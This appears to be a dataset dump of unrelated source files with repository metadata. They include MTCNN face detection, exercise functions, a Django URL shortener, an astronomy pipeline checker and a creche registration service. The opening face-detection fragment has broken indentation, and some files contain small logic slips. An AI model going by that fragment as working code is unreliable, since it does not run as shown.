landmarks[:, 5:10] = expand_dims(ymin, 1) + expand_dims(height, 1) * landmarks[:, 5:10]
        # Run the final nms
        keep = self.nms(bounding_boxes, self.nms_threshold[2])
        print('total bboxes after nms:', len(bounding_boxes))
bounding_boxes = bounding_boxes[keep]
landmarks = landmarks[keep]
probs = probs[keep]
        # # Output the candidate boxes of this stage
# onet_img = self.image.copy()
# for i in range(bounding_boxes.shape[0]):
# box = bounding_boxes[i, :4]
# onet_img = plot_one_box(box, onet_img, (255, 128, 128), None, 2)
# for landmark in landmarks:
# landmarks_x = landmark[:5]
# landmarks_y = landmark[5:]
# for i in range(5):
# cv2.circle(onet_img, (int(landmarks_x[i]), int(landmarks_y[i])), 2, (255, 128, 255), 1)
# plt.figure(figsize=(16, 16))
# plt.axis('off')
# plt.imshow(onet_img.astype(np.uint8))
gc.collect()
return self.image.copy(), bounding_boxes, probs, landmarks
    # Run the first stage
def run_first_stage(self, img, scale):
"""Run P-Net, generate bounding boxes, and do NMS.
Arguments:
img: an instance of PIL.Image.
scale: a float number,
scale width and height of the image by this number.
Returns:
a float numpy array of shape [n_boxes, 9],
bounding boxes with scores and offsets (4 + 1 + 4).
"""
sh, sw = img.shape[:2]
width, height = self.width, self.height
threshold = self.detection_threshold[0]
        # Apply basic preprocessing to the image, then feed it to pnet
for transform in self.preprocess_flow:
img = transform(img)
output = self.pnet(expand_dims(to_tensor(img), 0))
probs = output['confidence'][0, 0, :, :]
offsets = output['box']
        # Compute the candidate box coordinates from the fully convolutional network output
boxes = self.generate_bboxes(probs, offsets, scale, threshold)
        # Run nms on this scale's candidates first to cut down their number, so the later rnet and onet stages do not run out of GPU memory.
keep = self.nms(boxes[:, 0:5], overlap_threshold=self.nms_threshold[0])
boxes = boxes[keep].copy()
del output
return boxes
    # Crop face patches from the original image according to the candidate box coordinates, for the later stages
def get_image_boxes(self, bounding_boxes, size=24):
"""Cut out boxes from the image.
Arguments:
bounding_boxes: a float numpy array of shape [n, 5].
size: an integer, size of cutouts.
Returns:
a float numpy array of shape [n, 3, size, size].
"""
num_boxes = len(bounding_boxes)
height, width = self.image.shape[:2]
        # Allocate an empty img_boxes array to hold the cropped face regions
img_boxes = np.zeros((num_boxes, 3, size, size), "float32")
n = 0
for i in range(num_boxes):
x1, y1, x2, y2 = bounding_boxes[i][:4]
try:
                # Crop the face region from the x1, y1, x2, y2 coordinates, clamped to be non-negative and within the image width/height
yy1 = int(builtins.max(y1, 0))
yy2 = int(builtins.min(y2, self.height))
xx1 = int(builtins.max(x1, 0))
xx2 = int(builtins.min(x2, self.width))
img_box = self.image[yy1:yy2, xx1:xx2, :]
if img_box.shape[0] != img_box.shape[1]:
                    # If the crop is not square, pad it into a square
max_length = builtins.max(list(img_box.shape[:2]))
new_img_box = np.zeros((max_length, max_length, 3))
new_img_box[0:img_box.shape[0], 0:img_box.shape[1], :] = img_box
img_box = new_img_box
                # Resize the square region, run it through self.preprocess_flow, then store it in img_boxes
img_box = resize((size, size), keep_aspect=True)(img_box)
for transform in self.preprocess_flow:
img_box = transform(img_box)
img_boxes[i, :, :, :] = img_box
n += 1
            except Exception:
                pass
        # Print how many regions were cropped successfully (invalid coordinates can make a crop fail)
        print(n, 'image generated')
return img_boxes
def infer_single_image(self, img, **kwargs):
if self.model.built:
self.model.to(self.device)
self.model.eval()
image, boxes, probs, landmarks = self.detect(img)
        return image, to_numpy(boxes), to_numpy(probs).astype(np.float32), to_numpy(landmarks)
def infer_then_draw_single_image(self, img):
start_time = time.time()
rgb_image, boxes, probs, landmark = self.infer_single_image(img)
if boxes is not None and len(boxes) > 0:
boxes = np.round(boxes).astype(np.int32)
if boxes.ndim == 1:
boxes = np.expand_dims(boxes, 0)
print(img, time.time() - start_time)
pillow_img = array2image(rgb_image.copy())
        print(boxes, probs, flush=True)
if len(boxes) > 0:
for m in range(len(boxes)):
this_box = boxes[m]
this_label = 1
if int(this_label) > 0:
thiscolor = self.palette[1]
print('face', this_box, probs[m], flush=True)
pillow_img = plot_bbox(this_box, pillow_img, thiscolor, self.class_names[
int(this_label)] if self.class_names is not None else '', line_thickness=2)
rgb_image = np.array(pillow_img.copy())
return rgb_image, boxes, probs, landmark
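# Illustrative usage sketch of the three-stage pipeline above (the detector's constructor
# is defined earlier in this file and is not shown here, so the name `Mtcnn()` is an assumption):
#   detector = Mtcnn()
#   rgb_image, boxes, probs, landmarks = detector.infer_then_draw_single_image('face.jpg')
#   # boxes: candidate box coordinates, probs: confidences, landmarks: 10 values per face
#   # (x1..x5 then y1..y5), already mapped back to original-image coordinates by detect().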
|
AllanYiin/trident
|
trident/models/pytorch_mtcnn.py
|
pytorch_mtcnn.py
|
py
| 28,973 |
python
|
en
|
code
| 74 |
github-code
|
6
|
2642867267
|
def findPeakElement(nums):
if len(nums) == 1 or nums[0] > nums[1]:
return 0
n = len(nums)
if nums[n - 1] > nums[n - 2]:
return n - 1
# 0th and n - 1 th index already checked
start = 1
end = n - 1
while start <= end:
mid = start + (end - start) // 2
if nums[mid - 1] < nums[mid] > nums[mid + 1]:
return mid
# Find peak on the left
elif nums[mid] < nums[mid - 1]:
end = mid - 1
# Find peak on the right
else:
start = mid + 1
return -1
nums = [1, 2, 1, 3, 5, 6, 4]
print(findPeakElement(nums))
|
ArunRawat404/DSA
|
Binary Seach/1. BS on 1D Arrays/13. Find Peak Element.py
|
13. Find Peak Element.py
|
py
| 633 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40718345835
|
# Assignment - 20 Full Stack Web Development using Python MySirG
# More on functions
# 1. Write a python program to create a function that takes a list and returns a new list
# with the original list's unique elements.
def unique_list(l):
x = []
for a in l:
if a not in x:
x.append(a)
return x
print(unique_list([1,2,3,3,3,3,4,5]))
# 2. Write a python program to create a function that takes a number as a parameter and
# checks if the number is prime or not.
def check_prime(n):
if (n==1):
return False
elif (n==2):
return True
else:
for x in range(2,n):
if(n % x==0):
return False
return True
print(check_prime(11))
# 3. Write a python program to create a function that prints the even numbers from a
# given list.
# Sample List : [1, 2, 3, 4, 5, 6, 7, 8, 9]
def even(l):
l2=[]
for i in l:
if i%2==0:
l2.append(i)
return l2
l = [1, 2, 3, 4, 5, 6, 7, 8, 9]
result=even(l)
print(result)
# 4. Write a python program to create a function that checks whether a passed string is palindrome or not.
def strPalindrome(s,start,end):
while start<=end:
if s[start]==s[end]:
start=start+1
end=end-1
else:
return False
return True
s="nitin"
#s="abcddcba"
#s="mango"
start=0
end=len(s)-1
result=strPalindrome(s,0,end)
print (result)
# 5. Write a python program to create a function to find the Min of three numbers.
def minimum(a, b, c):
if (a <= b) and (a <= c):
smallest = a
elif (b <= a) and (b <= c):
smallest = b
else:
smallest = c
return smallest
a = 10
b = 14
c = 12
print(minimum(a, b, c))
# 6. Write a python program to create a function and print a list where the values are
# square of numbers between 1 and 30.
def fun():
l = list()
for i in range(1,31):
l.append(i**2)
print(l)
fun()
#7. Write a python program to access a function inside a function.
def num1(x):
def num2(y):
return x * y
return num2
res = num1(10)
print(res(5))
# 8. Write a python program to create a function that accepts a string and calculate the
# number of upper case letters and lower case letters.
x=input("Enter the string:- ")
def char(x):
u=0
l=0
for i in x:
if i>='a' and i<='z':
l+=1
if i >='A' and i<='Z':
u+=1
print("LowerCase letter in the String",l)
print("UpperCase letter in the String",u)
char(x)
# 9. Write a python program to create a function to check whether a string is a pangram or not.
from string import ascii_lowercase as asc_lower
def check(s):
return set(asc_lower) - set(s.lower()) == set([])
strng=input("Enter string:")
if(check(strng)==True):
print("The string is a pangram")
else:
print("The string isn't a pangram")
# 10. Write a python program to create a function to check whether a string is an anagram or not.
def check(s1, s2):
if(sorted(s1)== sorted(s2)):
print("The strings are anagrams.")
else:
print("The strings aren't anagrams.")
s1 ="listen"
s2 ="silent"
check(s1, s2)
|
Bhawna011/Python_Assignments
|
Assignment_20_function(2).py
|
Assignment_20_function(2).py
|
py
| 3,338 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12119046055
|
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
try:
from distutils.command.build_py import build_py_2to3 as build_py
except ImportError:
from distutils.command.build_py import build_py
path, script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(path))
requests = 'requests >= 2.1.0'
if sys.version_info < (2, 6):
requests += ', < 2.1.0'
install_requires = [requests, "future==0.15.2"]
# Don't import openpay module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'openpay'))
from version import VERSION
# Get simplejson if we don't already have json
if sys.version_info < (3, 0):
try:
import json
except ImportError:
install_requires.append('simplejson')
setup(name='openpay',
cmdclass={'build_py': build_py},
version=VERSION,
description='Openpay python bindings',
author='Openpay',
author_email='[email protected]',
url='https://www.openpay.mx/',
tests_require=['mock'],
packages=['openpay', 'openpay.test'],
package_data={'openpay': ['data/ca-certificates.crt', '../VERSION']},
install_requires=install_requires,
test_suite='openpay.test.all',
use_2to3=True,
)
|
open-pay/openpay-python
|
setup.py
|
setup.py
|
py
| 1,312 |
python
|
en
|
code
| 19 |
github-code
|
6
|
11601984964
|
import sqlite3
"""
Two functions to help the main.py functions to validate the reference variable.
"""
# Open the database and create a cursor
conn = sqlite3.connect("candidate.db")
c = conn.cursor()
""" **************************
Args - ref - str
Return - Bool
A validation function that takes the reference as an argument, checks the length is equal to 8 and then
if it is made up of only letters and numbers. If either of these steps fail, a relevant message is sent to the user
explaining why.
**************************"""
def valid_reference(ref):
if len(ref) != 8:
print("Reference must be 8 characters long.")
return False
else:
count = 0
for i in ref:
if (57 >= ord(i) >= 48) or (90 >= ord(i) >= 65) or (122 >= ord(i) >= 97):
count += 1
if count == 8:
return True
else:
print("Reference must be only letters/digits.")
return False
""" **************************
Args - ref - str
Return - either DB row or False
This function takes the reference as an argument and checks the database to see if it exists. If it does it
messages the user and return the record.
If not, then it returns False
**************************"""
def check_reference_exists(ref):
with conn:
c.execute("SELECT * FROM candidate_table WHERE reference=?", (ref,))
candidate_selected = c.fetchone()
if candidate_selected:
print("Reference exists...")
return candidate_selected
return False
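# Illustrative usage sketch (assumes candidate.db and candidate_table exist as set up above):
#   valid_reference("AB12CD34")   -> True  (exactly 8 characters, letters/digits only)
#   valid_reference("AB12-C34")   -> prints the reason and returns False
#   row = check_reference_exists("AB12CD34")  # the matching row tuple if found, else False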
|
JohnEHughes/arctic_shores_test_v1
|
validators.py
|
validators.py
|
py
| 1,584 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4461070550
|
# Licensed under a MIT style license - see LICENSE.txt
"""MUSE-PHANGS check pipeline module
"""
__authors__ = "Eric Emsellem"
__copyright__ = "(c) 2017, ESO + CRAL"
__license__ = "MIT License"
__contact__ = " <[email protected]>"
# This module will take a MusePipe object and do the plot check ups
# Standard modules
from os.path import join as joinpath
import glob
__version__ = '0.0.4 (21 Feb 2019)'
# v0.0.4: Debugged a bit more with the new MusePipe structure
# v0.0.3: Debugged a bit the sequence
# v0.0.2: Added some import after moving MuseCube, MuseImage, etc
# v0.0.1: initial
from .graph_pipe import GraphMuse
from .musepipe import MusePipe
from .mpdaf_pipe import MuseCube, MuseSpectrum, MuseSetSpectra
from .mpdaf_pipe import MuseImage, MuseSetImages, get_sky_spectrum
name_final_datacube = "DATACUBE_FINAL.fits"
PLOT = '\033[1;34;20m'
ENDC = '\033[0m'
def print_plot(text):
print(PLOT + "# CheckPipeInfo " + ENDC + text)
class CheckPipe(MusePipe):
"""Checking the outcome of the data reduction
"""
def __init__(self, mycube=name_final_datacube, pdf_name="check_pipe.pdf",
pipe=None, standard_set=True, **kwargs):
"""Init of the CheckPipe class. Using a default datacube to run some checks
and create some plots
"""
if pipe is not None:
self.__dict__.update(pipe.__dict__)
else:
MusePipe.__init__(self, **kwargs)
self.cube = MuseCube(filename=joinpath(self.paths.object, mycube))
self.pdf = GraphMuse(pdf_name=joinpath(self.paths.figures, pdf_name))
# Input parameters useful to define a set of spectra and images
suffix_skyspectra = kwargs.pop("suffix_skyspectra", "")
suffix_images = kwargs.pop("suffix_images", None)
if standard_set:
# getting standard spectra
self.cube.get_set_spectra()
# plotting all standard data
# Page 1
self.check_quadrants()
# plotting the white image and Ha image
# Page 2
self.check_white_line_images(line="Ha")
# plotting the sky spectra
# Page 3
self.check_sky_spectra(suffix_skyspectra)
# Checking some images only if suffix_images is provided
if suffix_images is not None:
self.check_given_images(suffix_images)
# closing the pdf
self.pdf.close()
def check_quadrants(self):
"""Checking spectra from the 4 quadrants
"""
print_plot("Plotting the 4 quadrants-spectra")
self.pdf.plot_page(self.cube.spec_4quad)
def check_master_bias_flat(self):
"""Checking the Master bias and Master flat
"""
bias = self.get_master(mastertype="Bias", scale='arcsinh', title="Master Bias")
        flat = self.get_master(mastertype="Flat", scale='arcsinh', title="Master Flat")
tocheck = MuseSetImages(bias, flat, subtitle="Master Bias - Master Flat")
print_plot("Plotting the Master Bias and Flat")
self.pdf.plot_page(tocheck)
def check_white_line_images(self, line="Ha", velocity=0.):
"""Building the White and Ha images and
Adding them on the page
"""
white = self.cube.get_whiteimage_from_cube()
linemap = self.cube.get_emissionline_image(line=line, velocity=velocity)
tocheck = MuseSetImages(white, linemap,
subtitle="White and emission line {0} images".format(line))
print_plot("Plotting the White and {0} images".format(line))
self.pdf.plot_page(tocheck)
def check_sky_spectra(self, suffix):
"""Check all sky spectra from the exposures
"""
sky_spectra_names = glob.glob(self.paths.sky +
"./SKY_SPECTRUM_*{suffix}.fits".format(suffix=suffix))
tocheck = MuseSetSpectra(subtitle="Sky Spectra")
counter = 1
for specname in sky_spectra_names:
tocheck.append(MuseSpectrum(source=get_sky_spectrum(specname),
title=f"Sky {counter:2d}", add_sky_lines=True))
counter += 1
print_plot("Plotting the sky spectra")
self.pdf.plot_page(tocheck)
def check_given_images(self, suffix=None):
"""Check all images with given suffix
"""
if suffix is None:
suffix = ""
image_names = glob.glob(self.paths.maps + "./*{0}*.fits".format(suffix))
tocheck = MuseSetImages(subtitle="Given Images - {0}".format(suffix))
counter = 1
for imaname in image_names:
tocheck.append(MuseImage(filename=imaname, title="Image {0:2d}".format(counter)))
counter += 1
print_plot("Plotting the set of given images")
self.pdf.plot_page(tocheck)
|
emsellem/pymusepipe
|
src/pymusepipe/check_pipe.py
|
check_pipe.py
|
py
| 4,869 |
python
|
en
|
code
| 7 |
github-code
|
6
|
36356263355
|
from PIL import ImageDraw
from configs.cfgs import args
def read_class_names(class_file_name):
'''loads class name from a file'''
names = {}
with open(class_file_name, 'r') as data:
for ID, name in enumerate(data):
names[ID] = name.strip('\n')
return names
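# Illustrative: the class file is assumed to contain one class name per line, e.g.
#   person
#   bicycle
#   car
# for which read_class_names(...) returns {0: 'person', 1: 'bicycle', 2: 'car'}.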
def draw_boxes(img, boxes):
"""
:param img:
:param boxes:
:return:
"""
draw = ImageDraw.Draw(img)
for box in boxes:
draw.rectangle(list(box), outline='red')
return img
class UnNormalizer(object):
def __init__(self, mean=None, std=None):
        if mean is None:
            self.mean = [0.485, 0.456, 0.406]
        else:
            self.mean = mean
        if std is None:
            self.std = [0.229, 0.224, 0.225]
        else:
            self.std = std
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be normalized.
Returns:
Tensor: Normalized image.
"""
for t, m, s in zip(tensor, self.mean, self.std):
t.mul_(s).add_(m)
return tensor
def test():
class_name = read_class_names(args.classes)
print(class_name)
if __name__ == "__main__":
test()
|
alexchungio/RetinaNet-Pytorch
|
utils/tools.py
|
tools.py
|
py
| 1,245 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2026787329
|
import csv
import matplotlib.pyplot as plt
Zb = [[], []]
# with open('F:/zhengwangwork/test csv/4.csv','rb')as f:
# reader=csv.reader(f)
# for row in reader:
# print(row[0])
file = open('../gold.csv', 'r', encoding='UTF-8')  # open the csv file
reader = csv.reader(file)  # create a csv reader
data = list(reader)  # convert the csv data into a list
length_h = len(data)  # number of rows
lenght_l = len(data[0])  # length of each row
x = list()
y = list()
for i in range(0, length_h):  # read from the first row onwards
    x.append(data[i][0])  # append the first column of every row to list x
    y.append(data[i][2])  # append the third column of every row to list y
plt.plot(x, y)  # draw the line chart
plt.show()  # show the line chart
|
Nienter/mypy
|
personal/gold.py
|
gold.py
|
py
| 775 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
34730801336
|
import logging
import json
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def lambda_handler(inputPayload, context):
slack_link = os.environ['SLACK_URL']
try:
url = inputPayload['issue']['html_url']
except Exception as e:
logger.error(e)
# return a 500 error code
res = json.dumps({'statusCode': 500, 'body': f'Error: {e}'})
return res
reply = {'text': f"Issue Created: {url}"}
res = requests.post(slack_link, json=reply)
return res
|
ByteOfKathy/esep-webhooks
|
lambda_function.py
|
lambda_function.py
|
py
| 536 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44343755795
|
import sys
from itertools import combinations as comb
sys.stdin = open('input/20529.txt')
input = sys.stdin.readline
def d(A, B):
return sum([A[i] != B[i] for i in range(4)])
T = int(input())
for tc in range(T):
N = int(input())
mbti = input().split()
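    # With only 16 possible MBTI strings, any group of more than 32 people must (by pigeonhole)
    # contain at least three identical types, so the minimum pairwise distance sum is 0.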
if len(mbti) > 32:
print(0)
else:
ans = 12
for c in set(list(comb(mbti, 3))):
dist = d(c[0], c[1]) + d(c[0], c[2]) + d(c[1], c[2])
ans = min(ans, dist)
print(ans)
|
nayeonkinn/algorithm
|
baekjoon/[S1] 20529. 가장 가까운 세 사람의 심리적 거리.py
|
[S1] 20529. 가장 가까운 세 사람의 심리적 거리.py
|
py
| 493 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29246617685
|
# from django.contrib import messages
from json import loads, dumps
from .models import Link
from django.db.models import Sum
from django.db import OperationalError
from tenacity import (retry, stop_after_attempt, wait_fixed,
retry_if_exception_type)
import random
import string
import datetime
from django.shortcuts import render, redirect, get_object_or_404
from django.http import (HttpResponse, HttpResponseServerError, Http404,
HttpResponseBadRequest)
# For Google Web Crawler to work and website to show up on Google
def robots_txt(request):
lines = [
"User-Agent: *",
"Disallow: /admin/"
# "Disallow: /*"
]
return HttpResponse("\n".join(lines), content_type="text/plain")
# Returning home page
def index(request):
stats = get_stats()
return render(request, 'shortner/index.html', context=stats)
# returns stats for rendering in index.html
def return_last_value(retry_state):
print(f'\n\n attempt number {retry_state.attempt_number} \n \
function for which retry was called: {retry_state.fn} \n\n')
@retry(retry=retry_if_exception_type(OperationalError),
stop=stop_after_attempt(3),
wait=wait_fixed(0.75),
retry_error_callback=return_last_value)
def get_stats():
# generating date information
d1 = datetime.datetime(2020, 8, 30)
d2 = datetime.datetime.now()
time_difference = d2-d1
months = round(time_difference.days / 30)
stats = {
'total_links': Link.objects.all().count(),
'total_clicks':
Link.objects.aggregate(total_clicks=Sum('clicks'))['total_clicks'],
'active_months': months
}
return stats
def check(request, shortlink):
if linkExists(shortlink):
return HttpResponse(dumps({'link': shortlink, 'available': False}))
else:
return HttpResponse(dumps({'link': shortlink, 'available': True}))
# not strictly required but might be useful for debugging
print('nothing got returned')
def create(request):
# assump1: post body exists
# assump2: post body has 'longlink' defined
if request.method != 'POST':
return redirect('/')
reqBody = loads(request.body)
longlink = reqBody['longlink']
shortlink = '' # temporary empty value
try:
shortlink = reqBody['shortlink']
if shortlink == '':
# ik it's wrong...sorry.
raise KeyError('Empty shortlink')
if linkExists(shortlink):
res = HttpResponseBadRequest()
res.reason_phrase = 'Shortlink already taken'
res.status_code = 400
return res
except KeyError:
shortlink = getShortRandomLink(5)
obj = Link(shortlink=shortlink, longlink=longlink)
obj.save()
return HttpResponse(dumps(obj.getDict()))
@retry(retry=retry_if_exception_type(OperationalError),
stop=stop_after_attempt(3),
wait=wait_fixed(0.75),
retry_error_callback=return_last_value)
def rediretor(request, shortlink):
shortlinkObj = get_object_or_404(Link, pk=shortlink)
# uncomment below lines when adding feature
shortlinkObj.clicks += 1
shortlinkObj.save()
return redirect(shortlinkObj.longlink)
def custom_404(request, exception):
return render(request, 'shortner/404.html', status=404)
def linkExists(shortlink):
try:
Link.objects.get(pk=shortlink)
return True
except Link.DoesNotExist:
return False
# ------- helper functions ---------
def getShortRandomLink(length):
    temp = get_random_string(length)
    if linkExists(temp):
        # recursion! regenerate until an unused link is found and return that result
        return getShortRandomLink(length)
    return temp
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
# function to tell user how many clicks their link have gotten
# usable as api/clicky/<shortlink>
def clicks(request, shortlink):
# print(f"shortlink of cliks is {shortlink}\n")
if linkExists(shortlink):
link = Link.objects.get(pk=shortlink)
return HttpResponse(link.clicks)
else:
return HttpResponse('0')
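# Illustrative request sketch (field names taken from the create() view above; the URL route
# that maps to it is an assumption):
#   POST /create  with JSON body {"longlink": "https://example.com", "shortlink": "mylink"}
#   -> returns the serialized Link object, or 400 "Shortlink already taken" on a collision;
#      omitting "shortlink" falls back to a random 5-character code.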
|
RahulTandon1/cutshort
|
shortner/views.py
|
views.py
|
py
| 4,216 |
python
|
en
|
code
| 3 |
github-code
|
6
|
15183195346
|
#! usr/bin/env python
# -*- coding : utf-8 -*-
from skopt import gp_minimize
import numpy as np
from skopt.plots import plot_convergence
np.random.seed(123)
#%matplotlib inline
import matplotlib.pyplot as plt
noise_level = 0.1
def f(x, noise_level=noise_level):
return np.sin(5 * x[0]) * (1 - np.tanh(x[0] ** 2)) + np.random.randn() * noise_level
# Plot f(x) + contours
x = np.linspace(-2, 2, 400).reshape(-1, 1)
fx = [f(x_i, noise_level=0.0) for x_i in x]
plt.plot(x, fx, "r--", label="True (unknown)")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate(([fx_i - 1.9600 * noise_level for fx_i in fx],
[fx_i + 1.9600 * noise_level for fx_i in fx[::-1]])),
alpha=.2, fc="r", ec="None")
#plt.legend()
#plt.grid()
#plt.show()
res = gp_minimize(f,                  # the function to minimize
[(-2.0, 2.0)], # the bounds on each dimension of x
acq_func="EI", # the acquisition function
n_calls=15, # the number of evaluations of f
n_random_starts=5, # the number of random initialization points
noise=0.1**2, # the noise level (optional)
random_state=123) # the random seed
#print(res)
#plot_convergence(res);
plt.rcParams["figure.figsize"] = (6, 4)
# Plot f(x) + contours
x = np.linspace(-2, 2, 400).reshape(-1, 1)
x_gp = res.space.transform(x.tolist())
fx = [f(x_i, noise_level=0.0) for x_i in x]
plt.plot(x, fx, "r--", label="True (unknown)")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate(([fx_i - 1.9600 * noise_level for fx_i in fx],
[fx_i + 1.9600 * noise_level for fx_i in fx[::-1]])),
alpha=.2, fc="r", ec="None")
# Plot GP(x) + contours
gp = res.models[-1]
y_pred, sigma = gp.predict(x_gp, return_std=True)
plt.plot(x, y_pred, "g--", label=r"$\mu_{GP}(x)$")
plt.fill(np.concatenate([x, x[::-1]]),
np.concatenate([y_pred - 1.9600 * sigma,
(y_pred + 1.9600 * sigma)[::-1]]),
alpha=.2, fc="g", ec="None")
# Plot sampled points
plt.plot(res.x_iters,
res.func_vals,
"r.", markersize=15, label="Observations")
plt.title(r"$x^* = %.4f, f(x^*) = %.4f$" % (res.x[0], res.fun))
plt.legend(loc="best", prop={'size': 8}, numpoints=1)
plt.grid()
plt.show()
|
aggarwalpiush/Hyperparameter-Optimization-Tutorial
|
main.py
|
main.py
|
py
| 2,364 |
python
|
en
|
code
| 3 |
github-code
|
6
|
25231399833
|
#! /usr/bin/env python
# encoding: utf-8
# vim: ai ts=4 sts=4 et sw=4
##
##
## @author Nadia
## [email protected]/[email protected]
##
from coreapp.appmodel.models import CrecheParent, CrecheChild, PARENT_CHILD_RELATION
from coreapp.service.base_service import BaseService
from coreapp.service.child_service import ChildService, GENDER, CHILD_CLASSES
from coreapp.exception.critical_error import CriticalError
from django.db.models import Q, Max
from django.utils.datetime_safe import datetime
class ParentService(BaseService):
def __init__(self):
BaseService.__init__(self)
def list(self, params):
sortLimitParams = self.setSortLimitParameters(params)
filterObj = Q()
if params.get('searchName'):
filterObj = filterObj & Q(names__icontains=params.get('searchName'))
if params.get('searchParentId'):
            filterObj = filterObj & Q(id=params.get('searchParentId'))
if params.get('searchDateCreated'):
filterObj = filterObj & Q(
date_created__gte=datetime.strptime(params.get('searchDateCreated') + ' 00:00:59',
'%Y-%m-%d %H:%M:%S'))
filterObj = filterObj & Q(
date_created__lte=datetime.strptime(params.get('searchDateCreated') + ' 23:59:59',
'%Y-%m-%d %H:%M:%S'))
if params.get('searchTelephone'):
filterObj = filterObj & Q(telephone = params.get('searchTelephone'))
if params.get('searchIDNO'):
filterObj = filterObj & Q(identity_document = params.get('searchIDNO'))
if params.get('searchEmail'):
filterObj = filterObj & Q(email = params.get('searchEmail'))
result = CrecheParent.objects.filter(filterObj).order_by(sortLimitParams['dir'] + sortLimitParams['sort'])[
sortLimitParams['start']: sortLimitParams['limit']]
count = CrecheParent.objects.filter(filterObj).count()
records = []
for item in result:
record = {}
record['id'] = item.id
record['telephone'] = item.telephone.encode('utf-8')
record['id_number'] = item.identity_document.encode('utf-8')
record['date_created'] = item.date_created.isoformat()
record['children'] = [ {"names": ch.names, "regno": ch.regno, "id": ch.id} for ch in item.children.all()]
record['address'] = item.full_address.encode('utf-8')
record['email'] = item.email.encode('utf-8')
record['names'] = item.names
record['relationship'] = item.relationship.encode('utf-8')
records.append(record)
return {'totalCount': count, 'records': records}
def listExport(self, params):
"""Export the applicant data"""
records = self.list(params)
return self.decodeDataToExport(records, params.get('exportColumns'))
def save_parent(self, postValues):
"""
we assume we will not register a child without a parent, and a parent without a child
:param postValues:
:return:
"""
parent = None
params = postValues.copy()
if params.get('parent_names'):
try:
parent = CrecheParent.objects.get(id = params.get('id_number'))
parent.names = params.get('parent_names')
parent.telephone = params.get('telephone')
                parent.identity_document = params.get('id_number')
parent.relationship = params.get('relationship')
parent.full_address = params.get('full_address')
                parent.email = params.get('email')
parent.last_updated = datetime.now()
except CrecheParent.DoesNotExist:
parent = CrecheParent( names = params.get('parent_names'),
telephone = params.get('telephone'),
                                       identity_document = params.get('id_number'),
relationship=params.get('relationship'),
full_address=params.get('full_address'),
email=params.get('email'),
date_created=datetime.now(),
last_updated = datetime.now()
)
try:
parent.save()
except Exception:
raise CriticalError({'message': "Unkwon Error while saving parent '" + params.get("parent_names") + "'. Try again or contact system admin "})
return parent
def save_parent_child(self, postValues):
"""
we assume we will not register a child without a parent, and a parent without a child
:param postValues:
:return:
"""
parent = None
child = None
params = postValues.copy()
if params.get('parent_names'):
try:
parent = CrecheParent.objects.get(id = params.get('id_number'))
parent.names = params.get('parent_names')
parent.telephone = params.get('telephone')
parent.identity_document = params.get('id_number')
parent.relationship = params.get('relationship')
parent.full_address = params.get('full_address')
                parent.email = params.get('email')
parent.last_updated = datetime.now()
except CrecheParent.DoesNotExist:
parent = CrecheParent( names = params.get('parent_names'),
telephone = params.get('telephone'),
identity_document = params.get('id_number'),
relationship=params.get('relationship'),
full_address=params.get('full_address'),
email=params.get('email'),
date_created=datetime.now(),
last_updated = datetime.now()
)
try:
child_service = ChildService()
child = child_service.save_child(postValues)
print("CHILD : ", child.__dict__)
if child:
parent.save()
parent.children.add(child)
#parent.save()
else:
raise CriticalError({'message': "The child '" + params.get(
'child_names') + "' of parent '" + params.get("parent_names") + "' was not saved. Try again "})
except Exception as e:
try:
child.delete()
parent.delete()
except Exception as ex:
print("ERROR ROLLING BACK", ex)
print("PARENT CHILD ERROR ", e)
raise CriticalError({'message': "Unkwon Error while saving child '" + params.get(
'child_names') + "' of parent '" + params.get("parent_names") + "'. Try again or contact system admin "})
return parent, child
def add_child(self, parentObj, child_id = None, regno = None):
if child_id:
parentObj.children.add(CrecheChild.objects.get(id= child_id))
if regno:
parentObj.children.add(CrecheChild.objects.get(regno=regno))
parentObj.save()
return parentObj
|
projet2019/Creche_Parentale
|
creche/coreapp/service/parent_service.py
|
parent_service.py
|
py
| 7,616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75127728507
|
# This script gets the data of a lineout for different components
import os
begin_file = 0
end_file = 20
file_step = 20
plt_prefix = "name_of_your_hdf5_files"
path_to_hdf5_files = "path_to_hdf5s"
# Choose components
components = ["phi", "lapse", "chi"]
# specify a begin and end point for the lineout, e.g. two (x,y) points if you sliced normal to z
[x_min, y_min, z_min] = [0, 0, 0]
[x_max, y_max, z_max] = [3000, 0, 0]
def rendering():
def lineout(name):
AddPlot("Curve", "operators/Lineout/" + name, 1, 1)
LineoutAtts = LineoutAttributes()
LineoutAtts.point1 = (x_min, y_min, z_min)
LineoutAtts.point2 = (x_max, y_max, z_max)
SetOperatorOptions(LineoutAtts, 1)
def window_options(name):
SaveWindowAtts = SaveWindowAttributes()
SaveWindowAtts.outputToCurrentDirectory = 1
SaveWindowAtts.fileName = name + "_"
SaveWindowAtts.family = 1
SaveWindowAtts.format = SaveWindowAtts.CURVE # BMP, CURVE, JPEG, OBJ, PNG, POSTSCRIPT, POVRAY, PPM, RGB, STL, TIFF, ULTRA, VTK, PLY
SetSaveWindowAttributes(SaveWindowAtts)
# Evolve reading next hdf5 files
for i in range(begin_file ,end_file ,file_step):
hdf5filename = plt_prefix + "%06i.3d.hdf5"%i
print("Analysing file " + hdf5filename)
OpenDatabase(path_to_hdf5_files + hdf5filename)
for name in components:
window_options(name)
lineout(name)
DrawPlots()
SaveWindow()
DeleteAllPlots()
print("Component: " + name)
CloseDatabase(path_to_hdf5_files + hdf5filename)
if __visit_script_file__ == __visit_source_file__:
rendering()
os.remove("./visitlog.py")
|
GRChombo/Postprocessing_tools
|
VisItTools/LineoutTools/CurveLineout.py
|
CurveLineout.py
|
py
| 1,839 |
python
|
en
|
code
| 1 |
